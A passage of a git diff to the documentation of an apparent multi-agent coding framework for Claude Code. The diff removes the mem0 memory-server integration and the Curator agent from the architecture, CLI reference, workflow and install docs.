namespaces (branch → project → org) for pattern organization **Token Usage:** 5-8K tokens (depends on workflow size) **When to use:** @@ -632,7 +623,6 @@ Typical token consumption per subtask (estimated): | Predictor | 1.5K | 1K | 2.5K | Conditional in /map-efficient, always in /map-debug | | Evaluator | 2K | 1K | 3K | Only in /map-debug, /map-review | | Reflector | 2K | 1K | 3K | Only via /map-learn | -| Curator | 1.5K | 0.5K | 2K | Only via /map-learn | | DebateArbiter | 3K | 2K | 5K | Opus model, /map-debate only (includes synthesis) | | Synthesizer | 2K | 3K | 5K | /map-efficient Self-MoA only (DebateArbiter handles this in /map-debate) | | ResearchAgent | 2K | 4K | 6K | Heavy codebase reading, on-demand in any workflow | @@ -642,7 +632,7 @@ Typical token consumption per subtask (estimated): - /map-efficient (Self-MoA): ~25-30K tokens (3× Actor + Synthesizer) - /map-fast: ~8-10K tokens (minimal, no learning) - /map-debug: ~15-20K tokens (full pipeline with Evaluator) -- /map-review: ~15-25K tokens (4 mem0 queries + parallel agents + interactive 4-section presentation; --ci mode ~12-15K) +- /map-review: ~15-25K tokens (parallel agents + interactive 4-section presentation; --ci mode ~12-15K) - /map-debate: ~30-40K tokens (3× Actor + Opus DebateArbiter) **For 5-subtask workflow:** @@ -658,7 +648,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de ### Hook-Based Context Injection (v2.0.0+) -**Problem:** Long command files (995 lines, ~5.4K tokens) cause attention dilution → Claude skips critical workflow steps like mem0 search and self-audit (20% compliance rate). +**Problem:** Long command files (995 lines, ~5.4K tokens) cause attention dilution → Claude skips critical workflow steps like research and self-audit (20% compliance rate). **Solution:** State-machine orchestration + PreToolUse hook injection @@ -676,7 +666,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de ┌─────────────────────────────────────────────────────────────┐ │ map-efficient.md (~1.75K tokens, down from ~5.4K) │ │ 1. Get next step instruction (map_orchestrator.py) │ -│ 2. Route to executor (Actor/Monitor/mem0/etc) │ +│ 2. Route to executor (Actor/Monitor/etc) │ │ 3. Execute step │ │ 4. Validate completion → Update state │ │ 5. Recurse if more steps; else complete │ @@ -700,12 +690,12 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de ╔═══════════════════════════════════════════════════════════╗ ║ MAP WORKFLOW CHECKPOINT ║ ╠═══════════════════════════════════════════════════════════╣ -║ Current Step: 2.1 - MEM0_SEARCH +║ Current Step: 2.2 - RESEARCH ║ Progress: Subtask 1/5 ║ Completed: 1.0_DECOMPOSE, 1.5_INIT_PLAN, 2.0_XML_PACKET ║ ║ ⚠️ MANDATORY NEXT ACTION: -║ Call mcp__mem0__map_tiered_search BEFORE Actor +║ Call research-agent BEFORE Actor ╚═══════════════════════════════════════════════════════════╝ ``` @@ -717,7 +707,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de |--------|---------------|----------------| | **Step compliance** | ~20% | ~85% (predicted) | | **Command file tokens** | ~5,400 | ~1,750 | -| **mem0 search skip rate** | 80% | ~5% (predicted) | +| **Research skip rate** | 80% | ~5% (predicted) | | **Self-audit skip rate** | 90% | ~10% (predicted) | | **User interventions** | ~3 per workflow | ~0.3 (predicted) | | **Hook latency** | N/A | <100ms | @@ -737,8 +727,7 @@ See [USAGE.md - Workflow Variants](./USAGE.md#workflow-variants) for detailed de 4. `1.56 CHOOSE_MODE` - Select execution mode (step_by_step|batch) 5. `1.6 INIT_STATE` - Create workflow_state.json 6. `2.0 XML_PACKET` - Build AI-friendly subtask packet -7. `2.1 MEM0_SEARCH` - Tiered memory search -8. `2.2 RESEARCH` - research-agent (conditional) +7. `2.2 RESEARCH` - research-agent (conditional) 9. `2.3 ACTOR` - Actor agent implementation 10. `2.4 MONITOR` - Monitor validation (retry up to 5 times) 11. `2.6 PREDICTOR` - Impact analysis (conditional) @@ -844,14 +833,12 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate 5. **Used Patterns** (pattern IDs applied) **Key Behaviors:** -- ALWAYS searches mem0 MCP for existing patterns first - Fetches current docs for external libraries (via context7) - Explicit error handling required (no silent failures) - Complete code, not sketches or placeholders - Security-first approach for auth/data access **MCP Tool Usage:** -- `mcp__mem0__map_tiered_search`: Find existing patterns before implementing - `mcp__context7__get-library-docs`: Get current library documentation ### 3. Monitor @@ -976,62 +963,14 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate ``` **Key Behaviors:** -- MUST search mem0 MCP for existing patterns first (avoid duplicates) - Extracts both successful patterns and failure lessons - Contextualizes lessons (when to apply, when to avoid) - Links to specific workflow outcomes **MCP Tool Usage:** -- `mcp__mem0__map_tiered_search`: Check for existing similar patterns - `mcp__sequential-thinking__sequentialthinking`: Structure reasoning process -### 7. Curator - -**Responsibility:** Manage knowledge base (mem0) with incremental updates. - -**Input:** Reflector's extracted patterns - -**Output:** -```json -{ - "patterns_to_add": [ - { - "pattern_id": "impl-0008", - "content": "Use bcrypt for password hashing with work factor 12", - "category": "implementation", - "tags": ["security", "authentication", "passwords"], - "tier": "project" - } - ], - "patterns_to_update": [ - { - "pattern_id": "impl-0003", - "updates": {"content": "Updated JWT signature algorithm from HS256 to RS256"}, - "reason": "Security improvement based on recent OWASP guidelines" - } - ], - "patterns_to_archive": [] -} -``` - -**Operations:** -- **ADD:** New pattern not in mem0 (via `mcp__mem0__map_add_pattern`) -- **UPDATE:** Improve existing pattern -- **ARCHIVE:** Mark pattern as deprecated (via `mcp__mem0__map_archive_pattern`) -- **NONE:** No changes needed - -**Key Behaviors:** -- MUST search mem0 MCP for duplicates before adding -- Fingerprint-based deduplication (exact match prevention) -- Uses tiered storage (branch → project → org namespaces) -- Incremental updates only (no full rewrites) - -**MCP Tool Usage:** -- `mcp__mem0__map_tiered_search`: Deduplication check -- `mcp__mem0__map_add_pattern`: Store new patterns -- `mcp__mem0__map_archive_pattern`: Deprecate outdated patterns - -### 8. DocumentationReviewer +### 7. DocumentationReviewer **Responsibility:** Check documentation completeness and correctness. @@ -1057,7 +996,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate - ✅ Configuration options explained - ✅ Examples match actual code behavior -### 9. Synthesizer +### 8. Synthesizer **Responsibility:** Merge best elements from multiple Actor variants in Self-MoA (Mixture of Agents) workflows. @@ -1098,7 +1037,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate **Usage Context:** Only invoked in `/map-debate` workflow after DebateArbiter completes cross-evaluation -### 10. DebateArbiter +### 9. DebateArbiter **Responsibility:** Cross-evaluate multiple Actor variants with explicit reasoning, identify best approaches for each decision point. @@ -1161,7 +1100,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate **MCP Tool Usage:** - `mcp__sequential-thinking__sequentialthinking`: Multi-step reasoning for complex trade-off analysis -### 11. ResearchAgent +### 10. ResearchAgent **Responsibility:** Heavy codebase reading with context isolation and compressed output for Actor/Monitor consumption. @@ -1210,7 +1149,7 @@ If you modified `.claude/commands/map-efficient.md`, you must manually integrate - Outputs compressed summary (<2K tokens) - Prevents Actor context bloat (would be 20-50K tokens if Actor read directly) -### 12. FinalVerifier +### 11. FinalVerifier **Responsibility:** Adversarial verifier applying the "Four-Eyes Principle" — verifies the ENTIRE task goal is achieved, not just individual subtasks. Catches premature completion and hallucinated success. @@ -1258,7 +1197,6 @@ MAP uses MCP (Model Context Protocol) servers for enhanced capabilities beyond b | MCP Server | Purpose | Required For | Performance Notes | |------------|---------|--------------|-------------------| -| **mem0** | Tiered pattern storage and retrieval | Reflector, Curator, Actor | Low latency (<200ms) | | **claude-reviewer** | Professional code review | Monitor | Medium latency (~2-5s) | | **sequential-thinking** | Chain-of-thought reasoning | Complex problem solving | Medium latency (~1-3s) | | **context7** | Up-to-date library documentation | Actor (external libs) | Low latency (<500ms) | @@ -1275,14 +1213,6 @@ MCP servers are configured differently depending on the usage context: ```json { "mcp_servers": { - "mem0": { - "enabled": true, - "description": "Tiered pattern storage with semantic search", - "config": { - "retrieval_limit": 5, - "tiers": ["branch", "project", "org"] - } - }, "claude-reviewer": { "enabled": true, "description": "Professional code review with security analysis", @@ -1294,65 +1224,9 @@ MCP servers are configured differently depending on the usage context: } ``` -#### Global Configuration - -**File:** `mcp_config.json` (project root) - -```json -{ - "mcp_servers": { - "mem0": { - "enabled": true, - "description": "Tiered memory system for pattern storage", - "config": { - "retrieval_limit": 5 - } - } - } -} -``` - ### MCP Tool Usage Patterns -#### Pattern 1: Search Before Implement (Actor) - -```markdown -**BEFORE implementing any solution:** - -1. Search mem0 for existing patterns via tiered search: - - Query: "implementation pattern [feature_type]" - - Example: "implementation pattern JWT authentication" - - Tiers searched: L1 (recent) → L2 (frequent) → L3 (semantic) - -2. If relevant patterns found: - - Review code snippets and trade-offs - - Adapt to current context - - Track which patterns used (pattern IDs) - -3. If no patterns found: - - Proceed with fresh implementation - - Document new pattern for Reflector -``` - -#### Pattern 2: Deduplication (Reflector, Curator) - -```markdown -**BEFORE adding new patterns:** - -1. Reflector searches mem0: - - Query: Pattern description - - Uses fingerprint-based exact match - -2. If similar pattern exists: - - Compare quality scores - - Decide: update existing or create new variant - -3. Curator confirms: - - Final deduplication check via `map_add_pattern` (returns created=false if duplicate) - - Operation: ADD vs UPDATE vs ARCHIVE vs NONE -``` - -#### Pattern 3: Current Documentation (Actor) +#### Pattern 1: Current Documentation (Actor) ```markdown **WHEN using external libraries:** @@ -1371,7 +1245,7 @@ MCP servers are configured differently depending on the usage context: - Deprecation warnings ``` -#### Pattern 4: Professional Review (Monitor) +#### Pattern 2: Professional Review (Monitor) ```markdown **AFTER Actor generates code:** @@ -1392,21 +1266,6 @@ MCP servers are configured differently depending on the usage context: ### Configuration Options -#### mem0 Configuration - -mem0 MCP server configuration is managed externally. Key parameters for MAP tools: - -**Tiered Search Parameters:** -- `query`: Search string for pattern matching -- `category`: Optional filter by section (e.g., "implementation", "debugging") -- Tiers: L1 (recent/branch) → L2 (frequent/project) → L3 (semantic/org) - -**Add Pattern Parameters:** -- `content`: Pattern text to store -- `category`: Section classification -- `fingerprint`: Auto-generated for deduplication -- `tier`: Target namespace (branch/project/org) - #### Context7 Configuration ```json @@ -1436,7 +1295,6 @@ mem0 MCP server configuration is managed externally. Key parameters for MAP tool ### MCP Server Availability **Commonly Available:** -- mem0 (tiered pattern storage) - claude-reviewer (code review) - sequential-thinking (reasoning) @@ -1453,25 +1311,16 @@ mem0 MCP server configuration is managed externally. Key parameters for MAP tool ### Performance Considerations **Latency Budget (per subtask):** -- mem0 searches: ~200ms each (Actor: 2-3 searches = ~600ms) - context7 docs: ~500ms per fetch (Actor: 1-2 fetches = ~1s) - claude-reviewer: ~2-5s per review (Monitor: 1 review) - Total overhead: ~2-7s per subtask **Optimization Strategies:** -- Use tiered search to get most relevant patterns first - Batch similar searches where possible -- Use `retrieval_limit` to control context size - Enable MCP caching when available (Phase 2 roadmap) --- -## Knowledge Graph Layer (Removed) - -> **Removed in v4.0+.** The legacy Knowledge Graph SQLite modules (entity_extractor, relationship_detector, contradiction_detector, graph_query) have been removed. All pattern storage, search, and contradiction detection are now handled via mem0 MCP tools. - ---- - ## Customization Guide ### Modifying Agent Prompts @@ -1506,11 +1355,10 @@ Agent prompts are located in `.claude/agents/*.md` and use **Handlebars template - Template variables: `{{language}}`, `{{project_name}}`, `{{framework}}` - Conditional blocks: `{{#if existing_patterns}}...{{/if}}` - Context sections: `{{subtask_description}}`, `{{feedback}}` -- ACE learning sections: existing patterns, used_patterns tracking **Why they're critical:** - Orchestrator fills these at runtime with project context -- Removing them breaks multi-language support, ACE learning, feedback loops +- Removing them breaks multi-language support and feedback loops - Git pre-commit hook validates their presence (see Hooks Integration) #### Template Variable Reference @@ -1526,7 +1374,7 @@ Agent prompts are located in `.claude/agents/*.md` and use **Handlebars template **Actor-specific:** ```handlebars {{subtask_description}} # From TaskDecomposer -{{existing_patterns}} # Relevant patterns from mem0 +{{existing_patterns}} # Relevant patterns from context {{#if feedback}} # Monitor feedback (retry loop) {{feedback}} {{/if}} @@ -1559,7 +1407,6 @@ MAP Framework uses intelligent model selection to balance quality and cost. | Predictor | sonnet-4-5 | Impact analysis requires complex reasoning | | Evaluator | sonnet-4-5 | Evaluation requires nuanced judgment | | Reflector | sonnet-4-5 | Quality-critical: pattern extraction | -| Curator | sonnet-4-5 | Quality-critical: knowledge management | | DocumentationReviewer | sonnet-4-5 | Quality-critical: doc validation | | Synthesizer | sonnet-4-5 | Quality-critical: variant synthesis | | DebateArbiter | opus-4-5 | Highest quality: cross-variant reasoning | @@ -1580,7 +1427,7 @@ model: claude-sonnet-4-5 # or claude-haiku-3-5 - **Downgrade to Haiku:** Lower cost, risk of quality degradation in analysis and scoring **Recommended:** -- Keep on Sonnet: TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, Curator, DocumentationReviewer, Synthesizer, ResearchAgent +- Keep on Sonnet: TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, DocumentationReviewer, Synthesizer, ResearchAgent - Keep on Opus: DebateArbiter (cross-variant reasoning requires highest quality) - Safe to downgrade to Haiku: Predictor, Evaluator (if cost reduction is priority) @@ -1615,16 +1462,7 @@ model: claude-sonnet-4-5 # or claude-haiku-3-5 - **Framework**: {{framework}} ``` -4. **Specify MCP tool usage:** - ```markdown - ## MCP INTEGRATION - - **CRITICAL**: ALWAYS use mcp__mem0__map_tiered_search before auditing: - - Query: "security vulnerability [component_type]" - - Check for past security issues and fixes - ``` - -5. **Define output format:** +4. **Define output format:** ```markdown ## OUTPUT FORMAT @@ -1643,7 +1481,7 @@ model: claude-sonnet-4-5 # or claude-haiku-3-5 ``` ``` -6. **Update orchestration:** +5. **Update orchestration:** Edit `.claude/commands/map-efficient.md` to call new agent: ```markdown ## After Monitor validates: @@ -1756,7 +1594,7 @@ Located at: `.git/hooks/pre-commit` **Prevents commits if:** - Template variables removed from agents -- Critical sections deleted (mem0 patterns, feedback, context) +- Critical sections deleted (feedback, context) - Massive deletions (>500 lines) without review **Example block:** @@ -1805,11 +1643,6 @@ Agent template changes are tracked in the project's main CHANGELOG.md. ### Breaking Changes - Actor: Changed output format to include `used_patterns` array -- All agents: Migrated to mem0 MCP tools - -### Added -- Actor: MCP integration section with mem0 tool usage patterns -- Reflector: mem0 deduplication checks before pattern extraction ### Fixed - Monitor: Clarified validation criteria for error handling @@ -2153,7 +1986,7 @@ Claude Code hooks run in subprocess with restricted capabilities: | Capability | Available? | Workaround | |-----------|-----------|-----------| -| MCP tool access | ❌ No | Hooks can't call `mcp__mem0__map_tiered_search`, `sequential-thinking` | +| MCP tool access | ❌ No | Hooks can't call MCP tools like `sequential-thinking` | | Python imports | ❌ No | Must call separate Python script via subprocess | | Async operations | ❌ No | Synchronous execution only (5s timeout) | | External scripts | ✅ Yes | Can call `python3`, `jq`, bash utilities | @@ -2300,34 +2133,7 @@ All failures are non-blocking - hook returns `{"continue": true}` and logs error - ✅ Audit trail for compliance - ✅ Metrics dashboard input -### Pattern Top-K Limiting (Phase 1.3) - -**Problem:** Too many patterns distract model, reduce focus on most relevant patterns. - -**Solution:** Limit patterns retrieved to `limit=5` (configurable via tiered search). - -**Behavior:** - -```python -# In Actor agent context injection: -# mem0 tiered search returns limited results automatically -result = mcp__mem0__map_tiered_search( - query=subtask_description - # Returns up to 5 patterns by default -) -``` - -**Benefits:** -- ✅ ~15% token reduction in Actor prompts -- ✅ Improved focus on best patterns -- ✅ Faster retrieval via tiered caching - -**Customization:** -- `limit=3`: Simple tasks, minimal context needed -- `limit=5`: Balanced (recommended default) -- `limit=7-10`: Complex tasks requiring multiple pattern references - -### Template Optimization (Phase 1.4) +### Template Optimization (Phase 1.3) **Problem:** Verbose agent outputs waste tokens without adding value. @@ -2361,7 +2167,7 @@ result = mcp__mem0__map_tiered_search( **Phase 2** (Prioritized): 1. **Checkpoints** (high impact) — Workflow resumption after interruption -2. **MCP caching** (medium-high) — Latency reduction for mem0/context7 +2. **MCP caching** (medium-high) — Latency reduction for context7 3. **Keyword+semantic search** (medium) — Hybrid retrieval accuracy 4. **Pattern variation** (low-medium) — Few-shot bias reduction @@ -2378,7 +2184,7 @@ result = mcp__mem0__map_tiered_search( - **Monitor approval rate:** >80% first try (current: varies by task complexity) - **Evaluator scores:** average >7.0/10 (approval threshold) - **Iteration count:** <3 per subtask (indicates clear feedback) -- **Knowledge growth:** increasing high-quality patterns in mem0 (helpful_count >= 5) +- **Knowledge growth:** increasing high-quality patterns over time **Tracking:** ```bash @@ -2394,7 +2200,6 @@ cat .map/workflow_logs/feat_auth_20251023_143022.json | jq '.subtasks[].agents.e ## References - [MAP Paper - Nature Communications](https://github.com/Shanka123/MAP) -- [ACE Paper - arXiv:2510.04618v1](https://arxiv.org/abs/2510.04618v1) - [Context Engineering for AI Agents (Manus.im)](https://manus.im/blog/Context-Engineering-for-AI-Agents-Lessons-from-Building-Manus) - [Claude Code Documentation](https://docs.anthropic.com/en/docs/claude-code) diff --git a/docs/CLI_COMMAND_REFERENCE.md b/docs/CLI_COMMAND_REFERENCE.md index d7bb861..8ba2878 100644 --- a/docs/CLI_COMMAND_REFERENCE.md +++ b/docs/CLI_COMMAND_REFERENCE.md @@ -4,11 +4,8 @@ Complete reference for all mapify CLI commands with correct syntax, parameters, and common error corrections. -> **Note (v4.0+):** Pattern storage and retrieval is handled by the mem0 MCP server (tiered namespaces: branch → project → org). For pattern operations, use mem0 MCP tools: `mcp__mem0__map_tiered_search`, `mcp__mem0__map_add_pattern`, `mcp__mem0__map_archive_pattern`. - ## Table of Contents -- [Pattern Storage (mem0 MCP)](#pattern-storage-mem0-mcp) - [Validate Commands](#validate-commands) - [graph](#mapify-validate-graph) - [Root Commands](#root-commands) @@ -16,36 +13,6 @@ Complete reference for all mapify CLI commands with correct syntax, parameters, - [check](#mapify-check) - [upgrade](#mapify-upgrade) - [Common Mistakes](#common-mistakes) -- [Pattern Search Guide (mem0 MCP)](#pattern-search-guide-mem0-mcp) - ---- - -## Pattern Storage (mem0 MCP) - -Pattern storage and retrieval is handled by the mem0 MCP server (tiered namespaces: branch → project → org). - -### Search Patterns - -```bash -# Tiered search (recommended) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Use section_filter when you know the category -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - -### Store / Deprecate Patterns - -Patterns should be written through Curator: - -```bash -Task(subagent_type="curator", ...) - -# Curator uses: -# - mcp__mem0__map_add_pattern -# - mcp__mem0__map_archive_pattern -# - mcp__mem0__map_promote_pattern -``` --- @@ -110,10 +77,10 @@ mapify validate graph task_plan.json --format text ``` **Validation Checks:** -- ✅ No circular dependencies -- ✅ All dependencies exist (no forward references) -- ✅ Valid JSON format -- ⚠️ No orphaned tasks (warning only, unless `--strict`) +- No circular dependencies +- All dependencies exist (no forward references) +- Valid JSON format +- No orphaned tasks (warning only, unless `--strict`) --- @@ -193,67 +160,9 @@ Updates agent templates in `.claude/agents/` to latest versions. ### 1. Using Legacy CLI Commands -| ❌ Wrong | ✅ Correct | Explanation | -|---------|-----------|-------------| -| `mapify playbook ...` | `mcp__mem0__map_tiered_search` | In v4.0+, patterns are stored/retrieved via mem0 MCP | - -### 2. Writing Patterns Without Curator - -| ❌ Wrong | ✅ Correct | Explanation | -|---------|-----------|-------------| -| Direct mem0 writes from ad-hoc scripts | `Task(subagent_type="curator", ...)` | Curator handles deduplication + quality scoring | - -### 3. Wrong Approach (v4.0+ uses mem0 MCP) - -| ❌ Wrong | ✅ Correct | Explanation | -|---------|-----------|-------------| -| Direct database access for patterns | `mcp__mem0__map_add_pattern` via Curator | Direct access breaks integrity; patterns are in mem0 | -| Bypassing Curator for pattern writes | `Task(subagent_type="curator", ...)` | Curator handles deduplication and quality scoring | - ---- - -## Pattern Search Guide (mem0 MCP) - -mem0 search is semantic. Use descriptive queries and include the technology and intent. - -```bash -# Broad query -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# More specific query -mcp__mem0__map_tiered_search(query="retry with exponential backoff and jitter", limit=5) - -# Narrow by section when possible -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ---- - -## Integration with MAP Workflow - -### Curator Agent Usage (v4.0+) - -```bash -# Curator stores patterns via mem0 MCP: -mcp__mem0__map_add_pattern(content="...", category="implementation", tier="project") - -# Archive outdated patterns: -mcp__mem0__map_archive_pattern(pattern_id="impl-0042", reason="Superseded") -``` - -**Critical Rule**: Curator must: -- Use `mcp__mem0__map_tiered_search` to check for duplicates first -- Use `mcp__mem0__map_add_pattern` to store new patterns -- Use `mcp__mem0__map_archive_pattern` to deprecate patterns - -### Reflector Agent Usage (v4.0+) - -```bash -# Reflector searches for existing patterns via mem0: -mcp__mem0__map_tiered_search("error handling") -``` - -Searches across tiers (branch → project → org) before extracting new patterns. +| Wrong | Correct | Explanation | +|-------|---------|-------------| +| `mapify playbook ...` | Use slash commands (`/map-efficient`, etc.) | Legacy playbook CLI commands removed | --- diff --git a/docs/CLI_REFERENCE.json b/docs/CLI_REFERENCE.json index a4a0b35..32fc04e 100644 --- a/docs/CLI_REFERENCE.json +++ b/docs/CLI_REFERENCE.json @@ -2,7 +2,7 @@ "$schema": "http://json-schema.org/draft-07/schema#", "title": "Mapify CLI Reference", "version": "2.0.0", - "description": "Machine-readable specification of mapify CLI commands, parameters, and usage patterns. Pattern storage uses mem0 MCP (v4.0+).", + "description": "Machine-readable specification of mapify CLI commands, parameters, and usage patterns.", "commands": { "validate": { "description": "Validate task dependency graphs", @@ -161,77 +161,7 @@ } } }, - "mem0_mcp_tools": { - "description": "Pattern storage and retrieval via mem0 MCP (v4.0+). These replace the legacy playbook CLI commands.", - "tiered_search": { - "tool": "mcp__mem0__map_tiered_search", - "description": "Semantic search across tiered namespaces (branch -> project -> org)", - "parameters": { - "query": "Search string for pattern matching", - "user_id": "Org-scoped user identifier (e.g., \"org:acme-corp\")", - "run_id": "Tier-scoped run identifier (e.g., \"proj:my-app:branch:feat-auth\")", - "limit": "Maximum results to return (default: 5)", - "section_filter": "Optional filter by category", - "min_quality_score": "Optional minimum quality score threshold" - }, - "examples": [ - { - "call": "mcp__mem0__map_tiered_search(query=\"JWT authentication\", user_id=\"org:acme-corp\", run_id=\"proj:my-app:branch:feat-auth\", limit=5)", - "description": "Basic semantic pattern search with tier scope" - }, - { - "call": "mcp__mem0__map_tiered_search(query=\"input validation\", user_id=\"org:acme-corp\", run_id=\"proj:my-app:branch:feat-auth\", section_filter=\"SECURITY_PATTERNS\", limit=10)", - "description": "Search with section filter and tier scope" - } - ] - }, - "add_pattern": { - "tool": "mcp__mem0__map_add_pattern", - "description": "Store a new pattern (fingerprint-based deduplication)", - "parameters": { - "text": "Pattern text to store", - "section": "Section classification (e.g., SECURITY_PATTERNS, IMPLEMENTATION_PATTERNS)", - "scope": "Target namespace (branch/project/org)", - "user_id": "Org-scoped user identifier (e.g., \"org:acme-corp\")", - "run_id": "Tier-scoped run identifier (e.g., \"proj:my-app:branch:feat-auth\")", - "agent_origin": "Agent that created the pattern (e.g., \"curator\")", - "code_example": "Optional code example demonstrating the pattern", - "tech_stack": "Optional technology stack (e.g., [\"python\", \"sqlalchemy\"])", - "tags": "Optional tags for cross-referencing (e.g., [\"security\", \"jwt\"])" - }, - "note": "Should be called through Curator agent for deduplication" - }, - "archive_pattern": { - "tool": "mcp__mem0__map_archive_pattern", - "description": "Mark a pattern as deprecated", - "parameters": { - "memory_id": "ID of the pattern to archive", - "reason": "Reason for archiving", - "superseded_by": "Optional memory_id of the replacement pattern", - "archived_by": "Agent performing the archival (e.g., \"curator\")" - } - }, - "promote_pattern": { - "tool": "mcp__mem0__map_promote_pattern", - "description": "Promote a pattern to a higher tier", - "parameters": { - "memory_id": "ID of the pattern to promote", - "target_scope": "Target tier (\"project\" or \"org\")", - "user_id": "Org-scoped user identifier (e.g., \"org:acme-corp\")", - "target_run_id": "Target tier run identifier (e.g., \"proj:my-app\")", - "promoted_by": "Agent or mechanism performing promotion (e.g., \"auto\")", - "promotion_reason": "Reason for promotion (e.g., \"helpful_count >= 5\")" - } - } - }, "common_patterns": { - "mem0_search": { - "description": "mem0 provides semantic search across tiered namespaces", - "method": "Semantic search (embedding-based)", - "speed": "Low latency (<200ms)", - "use_case": "Pattern retrieval, conceptual search, similar patterns", - "syntax": "Natural language queries" - }, "stdin_support": { "description": "Commands that accept stdin input", "commands": [ @@ -246,42 +176,12 @@ { "category": "legacy_command", "mistake": "mapify playbook ...", - "reason": "Legacy playbook CLI commands removed in v4.0+", - "correction": "mcp__mem0__map_tiered_search(query=\"...\")", - "explanation": "Use mem0 MCP tools for pattern storage and retrieval" - }, - { - "category": "wrong_approach", - "mistake": "Direct mem0 writes without Curator", - "reason": "Bypasses deduplication and quality scoring", - "correction": "Task(subagent_type=\"curator\", ...)", - "explanation": "Curator handles fingerprint-based deduplication" + "reason": "Legacy playbook CLI commands removed", + "correction": "Use slash commands (/map-efficient, /map-learn, etc.)", + "explanation": "Use MAP slash commands for workflow operations" } ] }, - "integration_notes": { - "map_workflow": { - "description": "How MAP agents use mem0 MCP", - "curator_agent": { - "role": "Manages knowledge base via mem0 MCP", - "workflow": [ - "1. Curator analyzes reflector insights", - "2. Searches mem0 for duplicates via mcp__mem0__map_tiered_search", - "3. Stores new patterns via mcp__mem0__map_add_pattern", - "4. Archives outdated patterns via mcp__mem0__map_archive_pattern" - ], - "critical_rule": "NEVER write patterns directly - always use Curator agent" - }, - "reflector_agent": { - "role": "Searches for existing patterns before extracting new ones", - "workflow": [ - "1. Search mem0 for similar patterns via mcp__mem0__map_tiered_search", - "2. Extract only novel patterns", - "3. Pass to Curator for storage" - ] - } - } - }, "metadata": { "generated_from": "src/mapify_cli/__init__.py", "command_definitions": [ diff --git a/docs/COMPLETE_WORKFLOW.md b/docs/COMPLETE_WORKFLOW.md index 1a6adfa..ccb052d 100644 --- a/docs/COMPLETE_WORKFLOW.md +++ b/docs/COMPLETE_WORKFLOW.md @@ -124,9 +124,9 @@ Validation: ┌─────────────────────────────────────────────────────────────┐ │ Turn 2: Начало ST-001 │ ├─────────────────────────────────────────────────────────────┤ -│ • map_orchestrator → "Step 2.1: MEM0_SEARCH" │ -│ • Hook: "⚠️ Call mcp__mem0__map_tiered_search BEFORE Actor" │ -│ • Поиск существующих паттернов OAuth в mem0 │ +│ • map_orchestrator → "Step 2.1: RESEARCH" │ +│ • Hook: "⚠️ Gather context BEFORE Actor" │ +│ • Поиск существующих паттернов OAuth │ └─────────────────────────────────────────────────────────────┘ ↓ ┌─────────────────────────────────────────────────────────────┐ @@ -135,7 +135,7 @@ Validation: │ • map_orchestrator → "Step 2.3: ACTOR" │ │ • Hook: "⚠️ Use Edit/Write tools to apply code directly" │ │ • Actor: │ -│ 1. Анализирует паттерны из mem0 │ +│ 1. Анализирует существующий код │ │ 2. Генерирует config/oauth.py │ │ 3. ЗАПИСЫВАЕТ код с Write("/path/to/file", content) │ │ • 🆕 Код уже на диске! │ @@ -410,7 +410,6 @@ How to proceed? /map-learn "OAuth 2.0 implementation with CSRF protection" # Reflector извлекает уроки -# Curator сохраняет паттерны в mem0 MCP # Паттерны доступны для будущих проектов ``` diff --git a/docs/INSTALL.md b/docs/INSTALL.md index 5d8788e..646a4a2 100644 --- a/docs/INSTALL.md +++ b/docs/INSTALL.md @@ -147,11 +147,10 @@ mapify init my-project This will: - ✅ Create project directory -- ✅ Install 12 MAP agents (including ACE Reflector & Curator, Synthesizer, DebateArbiter, ResearchAgent, FinalVerifier) +- ✅ Install MAP agents (including Synthesizer, DebateArbiter, ResearchAgent, FinalVerifier) - ✅ Add 10 slash commands (/map-efficient, /map-debug, /map-fast, /map-debate, /map-learn, /map-review, /map-release, /map-check, /map-plan, /map-resume) - ✅ Configure essential MCP servers - ✅ Initialize git repository -- ✅ Configure ACE learning system (mem0 MCP) **Note:** MAP Framework is designed for Claude Code. All generated agents and commands are optimized for the Claude Code CLI. @@ -224,8 +223,7 @@ If you prefer manual setup: │ │ ├── monitor.md # Validates implementations │ │ ├── predictor.md # Analyzes impact and risks │ │ ├── evaluator.md # Scores solution quality - │ │ ├── reflector.md # ACE: Extracts lessons - │ │ ├── curator.md # ACE: Manages knowledge base + │ │ ├── reflector.md # Extracts lessons │ │ ├── synthesizer.md # Self-MoA: Merges variants │ │ ├── debate-arbiter.md # Opus: Cross-evaluates variants │ │ ├── research-agent.md # Isolated codebase research @@ -245,8 +243,6 @@ If you prefer manual setup: │ └── mcp_config.json ``` -> **Note (v4.0+):** Pattern storage uses mem0 MCP with tiered namespaces (branch → project → org). - ## Verify Installation Check that everything is installed correctly: @@ -304,42 +300,14 @@ MAP Framework uses **slash commands** as entry points that coordinate specialize - **`/map-plan`** - Architect phase only: decompose task without implementation - **`/map-release`** - Package release workflow with validation gates - **`/map-resume`** - Resume incomplete MAP workflow from checkpoint -- **`/map-learn`** - Extract lessons: reflector → curator → mem0 storage +- **`/map-learn`** - Extract lessons from completed workflows **Note:** Agents are invoked automatically by slash commands. Direct agent invocation is not the recommended approach—use the slash commands above for proper workflow orchestration. -### Learning System (mem0 MCP) - -MAP automatically learns from your work through the mem0 tiered memory system: - -```bash -# Search for relevant patterns via mem0 MCP -# In Claude Code, Curator agent calls: -mcp__mem0__map_tiered_search("JWT authentication") - -# Add new patterns via Curator agent -mcp__mem0__map_add_pattern(content="...", category="security", tier="project") -``` - -> **Note (v4.0+):** Pattern storage uses mem0 MCP with tiered namespaces (branch → project → org). - ## MCP Server Setup If you selected MCP servers during installation, ensure they're configured: -### mem0 (Knowledge Management) - RECOMMENDED - -**Overview:** - -- Tiered pattern storage 